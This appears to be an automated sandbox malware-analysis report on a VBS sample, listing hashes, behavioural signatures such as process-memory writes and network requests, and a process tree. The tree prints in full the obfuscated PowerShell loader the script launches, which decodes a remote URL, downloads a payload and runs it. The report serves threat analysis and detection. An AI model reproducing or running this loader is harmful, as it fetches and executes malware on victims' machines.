Analysis
-
max time kernel
117s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
22/08/2024, 10:24
Static task
static1
Behavioral task
behavioral1
Sample
94a386916bc0a33eebe0a466dbfcba90ccb88891e05b0a06d0f91a84432767d1.vbs
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
94a386916bc0a33eebe0a466dbfcba90ccb88891e05b0a06d0f91a84432767d1.vbs
Resource
win10v2004-20240802-en
General
-
Target
94a386916bc0a33eebe0a466dbfcba90ccb88891e05b0a06d0f91a84432767d1.vbs
-
Size
139KB
-
MD5
94afb2d35a2fcfc7473b57ff851451df
-
SHA1
e9287d3640a1c870a14f69e4dbc6bcb9e4a3b027
-
SHA256
94a386916bc0a33eebe0a466dbfcba90ccb88891e05b0a06d0f91a84432767d1
-
SHA512
f9d6e8367df303d7ef02b695574cb68c1123349b517724b0f59f59c3410a204dbfd6c0123e1ba963bd80a879de0c109c41d15725de0a912f5d80867c229b56f9
-
SSDEEP
3072:BjGO63YDSdYB51Gy/ABuIWHwxoH0sHXaHb0bIkNTEx29OjmB8ZJuZ:RGO63WSdYB51Gy/quNHwaHdHqHb0bIkx
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 3044 WScript.exe 6 3032 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3032 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3032 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3044 wrote to memory of 3032 3044 WScript.exe 30 PID 3044 wrote to memory of 3032 3044 WScript.exe 30 PID 3044 wrote to memory of 3032 3044 WScript.exe 30 PID 3032 wrote to memory of 2584 3032 powershell.exe 32 PID 3032 wrote to memory of 2584 3032 powershell.exe 32 PID 3032 wrote to memory of 2584 3032 powershell.exe 32
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\94a386916bc0a33eebe0a466dbfcba90ccb88891e05b0a06d0f91a84432767d1.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentCulture) {$Fosser='SUBsTR';$Fdestederne++;}$Fosser+='ing';Function Identitetsudviklingerne($Brombrbusk){$Nuraghe=$Brombrbusk.Length-$Fdestederne;For( $Complementary=2;$Complementary -lt $Nuraghe;$Complementary+=3){$Renlivedes+=$Brombrbusk.$Fosser.'Invoke'( $Complementary, $Fdestederne);}$Renlivedes;}function Spyhole($Bebyrdelser){ . ($Modvirkede) ($Bebyrdelser);}$Apprenticement=Identitetsudviklingerne '.dMIno zSki nlCalCha O/Si5 ,.C.0Sc Ka(O.W.niNenW,d voDewInsFr ,N,eTAk S1 e0F..Do0S,; a b.W,iiPonTe6ca4 ;,i DexUn6,p4Ec;Bo MirFovSe: S1Sv2.t1,r.Ls0Su)Or ,G CeL.cBakK,oT./Ce2Fr0Ve1 U0,u0Ma1Re0ov1B, ,FFoiHarnieVef.loG xke/Ge1An2Ud1 .Ti0 . ';$Sovemediciner=Identitetsudviklingerne 'KoUGrsO.eHjr,a-P,A ,gMee n.pt.u ';$Abildgaardes=Identitetsudviklingerne ' .hLat .tT.pUn: ./ S/Ru1Re0Ma3 ..Fu7,a7 V. a2 4 S6Po. V1S,5.a/AgR e,rfWarOpeT.s.rhVomDae mn .tSts ,. .p Cr emTe>Ekh GtG,ttepBisI.:la/ ,/Ors ,e .r Gv CrPu-PsjS k tPr. ec.ooAcm K/ HRMseMuf MrUnehrsMeh pmRee.in StCas ...lp ur,imAn ';$Repressionens=Identitetsudviklingerne 'Sh>ko ';$Modvirkede=Identitetsudviklingerne 'S.i re cxSa ';$Serviceorganisation='Vaulter';$philip = Identitetsudviklingerne 'TeegacquhP obi De%BaaGrpSkp GdS aOvtSta S% F\ .cP.oTepT,a,rrM.eCunc,tFl.DeG.eu AeA Cl& e&.l .teEncReh ,oAk rtDo ';Spyhole (Identitetsudviklingerne ' .$ FgOzlCyoF b ,aPrl A:K k Kr SoSuoPhnFoiLt=Al(NocHumNodMe Ma/PacPy Ud$Rop.rhC,iAmlG.i Vp C)V. ');Spyhole (Identitetsudviklingerne 'B.$ kg l ,oTubO.aSul r:FeBT.aMac At ,e .rfoiSaoerp .hOpa dgC.e =I,$ .A Kb,eiSplMedStg Sa .a .rBadskeUnsE.. asEbp,al RiFetBl(G.$UpRCheTrpAbrSoeU s.rs ,i Soann oeA,nPss,o)B. ');Spyhole (Identitetsudviklingerne 'St[ SNUneS.tHu.P SSue ArChvChi IcB eB PF,oCuiB nOrt OM ba BnElaFag eShr ,]Ch:La: oSEfeLacC u Br FiSttDoy RP,arVaoCatSmonec noSalBa Ch=A Pu[.tN,ae.dtYp.SaS .eFocZouTur IiCat SyOsPAlr.yo tBioSucAfoStlKlTUnyDrp SeUn]Ca:Ne:s,TScl,as ,1 2C ');$Abildgaardes=$Bacteriophage[0];$Complementarynterrace= (Identitetsudviklingerne 'Ho$K,g ,lSko bCraasl a:R,R ,a cdgii ,kAuaBol ,iS,t Te,rtDe=AfNV e rw B-VaOBub Hjd,eRecFot D DSbey esInt.aeI.mfe.PaNKaePatSo.UdWPlecob uC.ulUniN e OnDat');$Complementarynterrace+=$krooni[1];Spyhole ($Complementarynterrace);Spyhole (Identitetsudviklingerne 'Sl$ ,R Da udEmiAck Pa .l,eiAntcaeSpt ,.,rHSleE,a dMeePar Hs B[ $AfSQuoRev Be mm CeSpd ,iRacKaiS,n.ee ArDe].u=An$R APupGepKnrImeNenC,tO i ,c SeUnmSve.nn dtHi ');$Blnd115=Identitetsudviklingerne 'Fo$DrRAcaRadRiiA kS,akll,aiP.tBueVitel.UnDS oA wSan,rlProIga Nd nF DiTulTaeSe( P$StABdbMnihyl KdHeg,oa ia rrK.dGre,bsUn,E.$PrTBoaMas t i.eeForI,)Ge ';$Tastier=$krooni[0];Spyhole (Identitetsudviklingerne 'U,$ ,gIml ooTib uaRel.o:ReA,nm To Zwh,tIn= M(DeTR,e sC,t.i-dePS.at.tkahAo St$TrT NaScsElt Gi PeParSa)Cu ');while (!$Amowt) {Spyhole (Identitetsudviklingerne 'Ir$ ,g MlSto Fbpoa,olDr: TF .e DduntDoeSnrRiiDie,hrU.sCa= $ etUnrPeuIneLj ') ;Spyhole $Blnd115;Spyhole (Identitetsudviklingerne 'VaS DtSpaV rHat.e-BlSinlF e ,ePopSa Kv4St ');Spyhole (Identitetsudviklingerne ' ,$ GgWalmioGlb NaEllWh:,jA mtuoBlwHet A=B.(E.TS.e us Ct.e-ChPt aPatNdhEj Po$KrTSeaFlsM,t .i,oeA.rK.)Ex ') ;Spyhole (Identitetsudviklingerne 'La$Hygjal SoTob Tap.lno:PrsDeh,oiD,fBotSelL.eStsDis,n= d$IngOvlMuo Db saFrlUd:V CDeyGutSuoRudAre ynRedT r.eih.t oeFo5 ,7T + +s,%g.$ HB.naSkcSkt.ueFrr ,i .o .pBuhN,a Rg.ve.r.KocOpo luU,nK tB ') ;$Abildgaardes=$Bacteriophage[$shiftless];}$Sygeeksamenens=347050;$paraphemia=25698;Spyhole (Identitetsudviklingerne ' F$ igDel yoLybSya DlRa: aJTooOduDir Tn Da LlNoe,en,rs,r1Pa7 ,9Hu A =Se AfG eOrtTo-NeC,uoAsn itPoeMen.otR, Br$DeTGoaTysPatPoi.aeM.rGe ');Spyhole (Identitetsudviklingerne ' U$PagStlSpoBrbM.aMalS,:LsP,eoAmlChyB.gBeoNonCe2 C5 U Fi=f. Gr[SpSBlyGrsIntr.eAfmGv.R C.voUnn PvDieGnrExtO,]St:Vo: bF hr.ro EmPoBRaaOvsKleb,6L.4 oS.nttarTrib,nT,gAf(De$P.J,ooTruPrrBenoraPol.ce,nn KsFo1Aa7 ,9ye)N, ');Spyhole (Identitetsudviklingerne ' .$ShgM,lGto ob.ea.ol W:BaHAbezea rrH k GeB,n,niV nregAf Pr=Le o[N.SKay,rsUntS eu m h. TRueL x,utKo.SyEG,nBrcAfo.hd ,iNonUngA,] p:Sk: AAViSNiC.dIQ,IH..TiGCheOpt IS ttn rOvi nF,g y(Wa$ ,PR.o.olA y,eg .oD.n 2Ad5,r)kn ');Spyhole (Identitetsudviklingerne 'T $Pag.ol GoSibD.a TlAl: aU BnDei v ReUnrOvsGriP t va RrJii TaSenUni BsSumUn= T$BrHBoe ea rVokPaeKan i AnD,gLo.b sSluU bMostrt Ar Si.anBagPu(St$EpSOmyQug.eeTleTrkBosTraIlm AeS,nL eK nAfs.r,Tr$cop MaUnr,ta ,pbohsueS mM,i aa e)M ');Spyhole $Universitarianism;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\coparent.Gue && echo t"3⤵PID:2584
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b